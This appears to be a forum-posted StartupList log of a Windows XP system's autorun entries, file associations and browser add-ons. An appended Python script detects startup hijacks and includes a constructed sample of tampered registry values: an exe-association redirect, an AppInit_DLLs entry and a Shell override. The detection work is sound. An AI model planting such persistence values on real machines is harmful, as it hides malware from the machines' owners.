TkBellExe = "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
Symantec PIF AlertEng = "C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe" /a /m "C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\AlertEng.dll"
SunJavaUpdateSched = "C:\Program Files\Java\jre1.6.0_06\bin\jusched.exe"
WD Button Manager = WDBtnMgr.exe

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run

ctfmon.exe = C:\WINDOWS\system32\ctfmon.exe
AIM = C:\Program Files\AIM\aim.exe -cnetwait.odl
swg = C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
EasyLinkAdvisor = "C:\Program Files\Linksys EasyLink Advisor\LinksysAgent.exe" /startup
SUPERAntiSpyware = C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
MSMSGS = "C:\Program Files\Messenger\msmsgs.exe" /background

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Run

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Run

*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
[OptionalComponents]
*No values found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices

*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
[AdobeUpdater]
 =

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices

*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Run

*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Run

*Registry key not found*

--------------------------------------------------

File association entry for .EXE:
HKEY_CLASSES_ROOT\exefile\shell\open\command

(Default) = "%1" %*

--------------------------------------------------

File association entry for .COM:
HKEY_CLASSES_ROOT\comfile\shell\open\command

(Default) = "%1" %*

--------------------------------------------------

File association entry for .BAT:
HKEY_CLASSES_ROOT\batfile\shell\open\command

(Default) = "%1" %*

--------------------------------------------------

File association entry for .PIF:
HKEY_CLASSES_ROOT\piffile\shell\open\command

(Default) = "%1" %*

--------------------------------------------------

File association entry for .SCR:
HKEY_CLASSES_ROOT\scrfile\shell\open\command

(Default) = "%1" /S

--------------------------------------------------

File association entry for .HTA:
HKEY_CLASSES_ROOT\htafile\shell\open\command

(Default) = C:\WINDOWS\system32\mshta.exe "%1" %*

--------------------------------------------------

File association entry for .TXT:
HKEY_CLASSES_ROOT\txtfile\shell\open\command

(Default) = %SystemRoot%\system32\NOTEPAD.EXE %1

--------------------------------------------------

Enumerating Active Setup stub paths:
HKLM\Software\Microsoft\Active Setup\Installed Components
(* = disabled by HKCU twin)

[<{12d0ed0d-0ee0-4f90-8827-78cefb8f4988}] *
StubPath = C:\WINDOWS\system32\ieudinit.exe

[>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}]
StubPath = C:\WINDOWS\inf\unregmp2.exe /ShowWMP

[>{26923b43-4d38-484f-9b9e-de460746276c}] *
StubPath = %systemroot%\system32\shmgrate.exe OCInstallUserConfigIE

[>{60B49E34-C7CC-11D0-8953-00A0C90347FF}] *
StubPath = RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP

[>{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS] *
StubPath = RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP

[>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}] *
StubPath = %systemroot%\system32\shmgrate.exe OCInstallUserConfigOE

[{2C7339CF-2B09-4501-B3F3-F3508C9228ED}] *
StubPath = %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll

[{44BBA840-CC51-11CF-AAFA-00AA00B6015C}] *
StubPath = "%ProgramFiles%\Outlook Express\setup50.exe" /APP:OE /CALLER:WINNT /user /install

[{44BBA842-CC51-11CF-AAFA-00AA00B6015B}] *
StubPath = rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msnetmtg.inf,NetMtg.Install.PerUser.NT

[{5945c046-1e7d-11d1-bc44-00c04fd912be}] *
StubPath = rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msmsgs.inf,BLC.QuietInstall.PerUser

[{6BF52A52-394A-11d3-B153-00C04F79FAA6}] *
StubPath = rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\wmp11.inf,PerUserStub

[{7790769C-0471-11d2-AF11-00C04FA35D02}] *
StubPath = "%ProgramFiles%\Outlook Express\setup50.exe" /APP:WAB /CALLER:WINNT /user /install

[{89820200-ECBD-11cf-8B85-00AA005B4340}] *
StubPath = regsvr32.exe /s /n /i:U shell32.dll

[{89820200-ECBD-11cf-8B85-00AA005B4383}] *
StubPath = C:\WINDOWS\system32\ie4uinit.exe -BaseSettings

[{89B4C1CD-B018-4511-B0A1-5476DBF70820}] *
StubPath = C:\WINDOWS\system32\Rundll32.exe C:\WINDOWS\system32\mscories.dll,Install

[{8b15971b-5355-4c82-8c07-7e181ea07608}] *
StubPath = rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\fxsocm.inf,Fax.Install.PerUser

--------------------------------------------------

Enumerating ICQ Agent Autostart apps:
HKCU\Software\Mirabilis\ICQ\Agent\Apps

*Registry key not found*

--------------------------------------------------

Load/Run keys from C:\WINDOWS\WIN.INI:

load=*INI section not found*
run=*INI section not found*

Load/Run keys from Registry:

HKLM\..\Windows NT\CurrentVersion\WinLogon: load=*Registry value not found*
HKLM\..\Windows NT\CurrentVersion\WinLogon: run=*Registry value not found*
HKLM\..\Windows\CurrentVersion\WinLogon: load=*Registry key not found*
HKLM\..\Windows\CurrentVersion\WinLogon: run=*Registry key not found*
HKCU\..\Windows NT\CurrentVersion\WinLogon: load=*Registry value not found*
HKCU\..\Windows NT\CurrentVersion\WinLogon: run=*Registry value not found*
HKCU\..\Windows\CurrentVersion\WinLogon: load=*Registry key not found*
HKCU\..\Windows\CurrentVersion\WinLogon: run=*Registry key not found*
HKCU\..\Windows NT\CurrentVersion\Windows: load=*Registry value not found*
HKCU\..\Windows NT\CurrentVersion\Windows: run=*Registry value not found*
HKLM\..\Windows NT\CurrentVersion\Windows: load=*Registry value not found*
HKLM\..\Windows NT\CurrentVersion\Windows: run=*Registry value not found*
HKLM\..\Windows NT\CurrentVersion\Windows: AppInit_DLLs=

--------------------------------------------------

Shell & screensaver key from C:\WINDOWS\SYSTEM.INI:

Shell=*INI section not found*
SCRNSAVE.EXE=*INI section not found*
drivers=*INI section not found*

Shell & screensaver key from Registry:

Shell=Explorer.exe
SCRNSAVE.EXE=*Registry value not found*
drivers=*Registry value not found*

Policies Shell key:

HKCU\..\Policies: Shell=*Registry value not found*
HKLM\..\Policies: Shell=*Registry value not found*

--------------------------------------------------

Checking for EXPLORER.EXE instances:

C:\WINDOWS\Explorer.exe: PRESENT!

C:\Explorer.exe: not present
C:\WINDOWS\Explorer\Explorer.exe: not present
C:\WINDOWS\System\Explorer.exe: not present
C:\WINDOWS\System32\Explorer.exe: not present
C:\WINDOWS\Command\Explorer.exe: not present
C:\WINDOWS\Fonts\Explorer.exe: not present

--------------------------------------------------

Checking for superhidden extensions:

.lnk: HIDDEN! (arrow overlay: yes)
.pif: HIDDEN! (arrow overlay: yes)
.exe: not hidden
.com: not hidden
.bat: not hidden
.hta: not hidden
.scr: not hidden
.shs: HIDDEN!
.shb: HIDDEN!
.vbs: not hidden
.vbe: not hidden
.wsh: not hidden
.scf: HIDDEN! (arrow overlay: NO!)
.url: HIDDEN!
(arrow overlay: yes) .js: not hidden .jse: not hidden -------------------------------------------------- Verifying REGEDIT.EXE integrity: - Regedit.exe found in C:\WINDOWS - .reg open command is normal (regedit.exe %1) - Company name OK: 'Microsoft Corporation' - Original filename OK: 'REGEDIT.EXE' - File description: 'Registry Editor' Registry check passed -------------------------------------------------- Enumerating Browser Helper Objects: (no name) - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} (no name) - C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\NppBho.dll - {1E8A6170-7264-4D0F-BEAE-D42A53123C75} Skype add-on (mastermind) - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} (no name) - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll - {3049C3E9-B461-4BC5-8870-4C09146192CA} (no name) - C:\Program Files\Java\jre1.6.0_06\bin\ssv.dll - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} AOL Toolbar Launcher - C:\Program Files\AOL\AOL Toolbar 2.0\aoltb.dll - {7C554162-8CB7-45A4-B8F4-8EA1C75885F9} (no name) - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dll - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} -------------------------------------------------- Enumerating Task Scheduler jobs: *No jobs found* -------------------------------------------------- Enumerating Download Program Files: [{0000000A-0000-0010-8000-00AA00389B71}] CODEBASE = http://download.microsoft.com/downlo...367/wmavax.CAB [Microsoft Office Template and Media Control] InProcServer32 = C:\WINDOWS\Downloaded Program Files\IEAWSDC.DLL CODEBASE = http://office.microsoft.com/templates/ieawsdc.cab [Shockwave ActiveX Control] InProcServer32 = C:\WINDOWS\system32\Macromed\Director\SwDir.dll CODEBASE = http://download.macromedia.com/pub/s...irector/sw.cab [Windows Genuine Advantage Validation Tool] InProcServer32 = C:\WINDOWS\system32\LegitCheckControl.DLL 
CODEBASE = http://download.microsoft.com/downlo...eckControl.cab [Symantec Download Manager] InProcServer32 = C:\WINDOWS\Downloaded Program Files\symdlmgr.dll CODEBASE = https://webdl.symantec.com/activex/symdlmgr.cab [MUWebControl Class] InProcServer32 = C:\WINDOWS\system32\muweb.dll CODEBASE = http://www.update.microsoft.com/micr...?1213095264416 [Image Uploader Control] InProcServer32 = C:\WINDOWS\Downloaded Program Files\ImageUploader4.ocx CODEBASE = http://share.adoramapix.com/componen...eUploader4.cab [Java Plug-in 1.6.0_06] InProcServer32 = C:\Program Files\Java\jre1.6.0_06\bin\ssv.dll CODEBASE = http://java.sun.com/update/1.6.0/jin...ndows-i586.cab [{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}] CODEBASE = http://fpdownload.macromedia.com/get.../ultrashim.cab [Aurigma Image Uploader 3.5 Control] InProcServer32 = C:\WINDOWS\Downloaded Program Files\ImageUploader3.ocx CODEBASE = http://www.adoramapix.com/components/ImageUploader3.cab [Java Plug-in 1.6.0_06] InProcServer32 = C:\Program Files\Java\jre1.6.0_06\bin\ssv.dll CODEBASE = http://java.sun.com/update/1.6.0/jin...ndows-i586.cab [Shockwave Flash Object] InProcServer32 = C:\WINDOWS\system32\Macromed\Flash\Flash9f.ocx CODEBASE = http://download.macromedia.com/pub/s...sh/swflash.cab [Virtools WebPlayer Class] InProcServer32 = C:\Program Files\Virtools\3D Life Player\WebPlayer.ocx CODEBASE = http://a532.g.akamai.net/f/532/6712/.../installer.exe -------------------------------------------------- |
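Editor's note, as an added example that is not part of the post above nor of the StartupList or HijackThis tools: the values a helper reads first in a log like this are the shell\open\command entries for executable types, the AppInit_DLLs value, the Winlogon Shell value (and any Policies override of it), and whether an Explorer.exe copy shows up anywhere other than C:\WINDOWS. The Python below parses the dashed sections StartupList emits and applies those baseline checks. The known-good values are the stock Windows XP ones, which is exactly what the posted log shows; both sample logs inside the script are constructed, and the "hypothetical.exe" / "hypothetical.dll" names stand in for no real malware.

```python
# Added example: baseline triage of a StartupList log (Windows XP era).
# Not from the original post and not part of StartupList/HijackThis.
# Parses the dashed sections the tool emits and flags: non-stock
# file-association commands, a populated AppInit_DLLs, a replaced Winlogon
# Shell (or a Policies Shell override) and stray copies of Explorer.exe.
# Sample logs are constructed; "hypothetical.*" names are placeholders.
import re

SEPARATOR = "-" * 50

# Stock shell\open\command values for the types StartupList reports.
GOOD_ASSOC = {ext: '"%1" %*' for ext in (".EXE", ".COM", ".BAT", ".PIF")}
GOOD_ASSOC[".SCR"] = '"%1" /S'
GOOD_ASSOC[".HTA"] = 'C:\\WINDOWS\\system32\\mshta.exe "%1" %*'
GOOD_SHELL = {"explorer.exe", "*ini section not found*"}
VALUE_NOT_FOUND = "*registry value not found*"
STOCK_EXPLORER = r"c:\windows\explorer.exe"

ASSOC_RE = re.compile(r"^File association entry for (\.\w+):$")
DEFAULT_RE = re.compile(r"^\(Default\) = (.*)$")
APPINIT_RE = re.compile(r"AppInit_DLLs=(.*)$")
SHELL_RE = re.compile(r"^Shell=(.*)$")
POLICY_SHELL_RE = re.compile(r"^(HK\w+\\\.\.\\Policies): Shell=(.*)$")
EXPLORER_RE = re.compile(r"^(.+\\Explorer\.exe): PRESENT!$", re.I)


def split_sections(text):
    """Group non-blank lines into the blocks StartupList separates with dashes."""
    sections, current = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if line == SEPARATOR:
            if current:
                sections.append(current)
            current = []
        elif line:
            current.append(line)
    if current:
        sections.append(current)
    return sections


def check_startuplist(text):
    """Return findings as strings; an empty list means every check passed."""
    findings = []
    for sec in split_sections(text):
        m = ASSOC_RE.match(sec[0])
        if m:  # file-association block: compare (Default) with the stock value
            ext = m.group(1).upper()
            expected = GOOD_ASSOC.get(ext)
            for line in sec[1:]:
                d = DEFAULT_RE.match(line)
                if d and expected and d.group(1).strip().lower() != expected.lower():
                    findings.append(f"{ext} open command is not stock: {d.group(1).strip()}")
            continue
        for line in sec:
            if (a := APPINIT_RE.search(line)) and a.group(1).strip():
                findings.append(f"AppInit_DLLs is populated: {a.group(1).strip()}")
            if (s := SHELL_RE.match(line)) and s.group(1).strip().lower() not in GOOD_SHELL:
                findings.append(f"Winlogon Shell replaced: {s.group(1).strip()}")
            if (p := POLICY_SHELL_RE.match(line)) and p.group(2).strip().lower() != VALUE_NOT_FOUND:
                findings.append(f"Policies Shell override in {p.group(1)}: {p.group(2).strip()}")
            if (e := EXPLORER_RE.match(line)) and e.group(1).lower() != STOCK_EXPLORER:
                findings.append(f"Extra Explorer.exe copy: {e.group(1)}")
    return findings


# Constructed clean excerpt, modelled on the posted log (stock XP values).
CLEAN_LOG = r"""
--------------------------------------------------
File association entry for .EXE:
HKEY_CLASSES_ROOT\exefile\shell\open\command
(Default) = "%1" %*
--------------------------------------------------
Load/Run keys from Registry:
HKLM\..\Windows NT\CurrentVersion\Windows: AppInit_DLLs=
--------------------------------------------------
Shell & screensaver key from C:\WINDOWS\SYSTEM.INI:
Shell=*INI section not found*
Shell & screensaver key from Registry:
Shell=Explorer.exe
Policies Shell key:
HKCU\..\Policies: Shell=*Registry value not found*
--------------------------------------------------
Checking for EXPLORER.EXE instances:
C:\WINDOWS\Explorer.exe: PRESENT!
"""

# Constructed tampered excerpt: every deviation here is hypothetical.
TAMPERED_LOG = r"""
--------------------------------------------------
File association entry for .EXE:
HKEY_CLASSES_ROOT\exefile\shell\open\command
(Default) = C:\WINDOWS\system32\hypothetical.exe "%1" %*
--------------------------------------------------
Load/Run keys from Registry:
HKLM\..\Windows NT\CurrentVersion\Windows: AppInit_DLLs=C:\WINDOWS\system32\hypothetical.dll
--------------------------------------------------
Shell & screensaver key from Registry:
Shell=Explorer.exe C:\WINDOWS\system32\hypothetical.exe
Policies Shell key:
HKCU\..\Policies: Shell=C:\WINDOWS\system32\hypothetical.exe
--------------------------------------------------
Checking for EXPLORER.EXE instances:
C:\WINDOWS\Explorer.exe: PRESENT!
C:\WINDOWS\System32\Explorer.exe: PRESENT!
"""
```

Run against the posted log, every check above passes (the `"%1" %*` commands, the empty AppInit_DLLs, Shell=Explorer.exe with no Policies value, and a single Explorer.exe in C:\WINDOWS are all stock); the tampered sample produces five findings. The comparisons are case-insensitive because the registry is, and a non-matching value is reported rather than judged, since the analyst still has to decide whether a changed association points at a legitimate tool or at a hijack.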
Copyright © 1996 - 2008 TechGuy, Inc. All rights reserved.